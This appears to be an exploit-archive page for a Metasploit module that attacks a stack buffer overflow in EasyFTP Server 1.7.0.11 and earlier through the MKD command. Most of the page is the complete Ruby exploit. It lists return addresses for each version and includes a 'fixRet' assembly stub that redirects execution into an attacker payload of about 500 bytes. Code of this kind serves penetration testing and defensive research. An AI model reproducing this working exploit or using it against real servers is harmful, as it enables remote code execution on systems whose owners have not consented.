Exploit the possiblities

EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow

EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow
Posted Jul 27, 2010
Authored by x90c, jduck | Site metasploit.com

This Metasploit module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11 and earlier. EasyFTP fails to check input size when parsing 'MKD' commands, which leads to a stack based buffer overflow. NOTE: EasyFTP allows anonymous access by default. However, in order to access the 'MKD' command, you must have access to an account that can create directories. After version 1.7.0.12, this package was renamed "UplusFtp". This exploit utilizes a small piece of code that I\\'ve referred to as 'fixRet'. This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by 'fixing' the return address post-exploitation. See references for more information.

tags | exploit, overflow
MD5 | a31ab6edcdb29318cc3ec1bcff1a522d

EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow

Change Mirror Download
##
# $Id: easyftp_mkd_fixret.rb 9935 2010-07-27 02:25:15Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Remote::Ftp

def initialize(info = {})
super(update_info(info,
'Name' => 'EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11
and earlier. EasyFTP fails to check input size when parsing 'MKD' commands, which
leads to a stack based buffer overflow.

NOTE: EasyFTP allows anonymous access by default. However, in order to access the
'MKD' command, you must have access to an account that can create directories.

After version 1.7.0.12, this package was renamed "UplusFtp".

This exploit utilizes a small piece of code that I\'ve referred to as 'fixRet'.
This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by
'fixing' the return address post-exploitation. See references for more information.
},
'Author' =>
[
'x90c', # original version
'jduck' # port to metasploit / modified to use fix-up stub (works with bigger payloads)
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9935 $',
'References' =>
[
[ 'OSVDB', '62134' ],
[ 'URL', 'http://www.exploit-db.com/exploits/12044/' ],
[ 'URL', 'http://www.exploit-db.com/exploits/14399/' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Privileged' => false,
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x00\x0a\x0d\x2f\x5c",
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal - v1.7.0.2', { 'Ret' => 0x004041ec } ], # call ebp - from ftpbasicsvr.exe
[ 'Windows Universal - v1.7.0.3', { 'Ret' => 0x004041ec } ], # call ebp - from ftpbasicsvr.exe
[ 'Windows Universal - v1.7.0.4', { 'Ret' => 0x004041dc } ], # call ebp - from ftpbasicsvr.exe
[ 'Windows Universal - v1.7.0.5', { 'Ret' => 0x004041a1 } ], # call ebp - from ftpbasicsvr.exe
[ 'Windows Universal - v1.7.0.6', { 'Ret' => 0x004041a1 } ], # call ebp - from ftpbasicsvr.exe
[ 'Windows Universal - v1.7.0.7', { 'Ret' => 0x004041a1 } ], # call ebp - from ftpbasicsvr.exe
[ 'Windows Universal - v1.7.0.8', { 'Ret' => 0x00404481 } ], # call ebp - from ftpbasicsvr.exe
[ 'Windows Universal - v1.7.0.9', { 'Ret' => 0x00404441 } ], # call ebp - from ftpbasicsvr.exe
[ 'Windows Universal - v1.7.0.10', { 'Ret' => 0x00404411 } ], # call ebp - from ftpbasicsvr.exe
[ 'Windows Universal - v1.7.0.11', { 'Ret' => 0x00404411 } ], # call ebp - from ftpbasicsvr.exe
],
'DisclosureDate' => 'Apr 04 2010',
'DefaultTarget' => 0))
end

def check
connect
disconnect

if (banner =~ /BigFoolCat/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end

def make_nops(num); "C" * num; end

def exploit
connect_login

# NOTE:
# This exploit jumps to ebp, which happens to point at a partial version of
# the 'buf' string in memory. The fixRet below fixes up the code stored on the
# stack and then jumps there to execute the payload. The value in esp is used
# with an offset for the fixup.
fixRet_asm = %q{
mov edi,esp
sub edi, 0xfffffe10
mov [edi], 0xfeedfed5
add edi, 0xffffff14
jmp edi
}
fixRet = Metasm::Shellcode.assemble(Metasm::Ia32.new, fixRet_asm).encode_string

buf = ''

print_status("Prepending fixRet...")
buf << fixRet
buf << make_nops(0x20 - buf.length)

print_status("Adding the payload...")
buf << payload.encoded

# Patch the original stack data into the fixer stub
buf[10, 4] = buf[268, 4]

print_status("Overwriting part of the payload with target address...")
buf[268,4] = [target.ret].pack('V') # put return address @ 268 bytes

print_status("Sending exploit buffer...")
send_cmd( ['MKD', buf] , false)

handler
disconnect
end

end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    15 Files
  • 17
    Jan 17th
    16 Files
  • 18
    Jan 18th
    24 Files
  • 19
    Jan 19th
    15 Files
  • 20
    Jan 20th
    5 Files
  • 21
    Jan 21st
    1 Files
  • 22
    Jan 22nd
    15 Files
  • 23
    Jan 23rd
    12 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close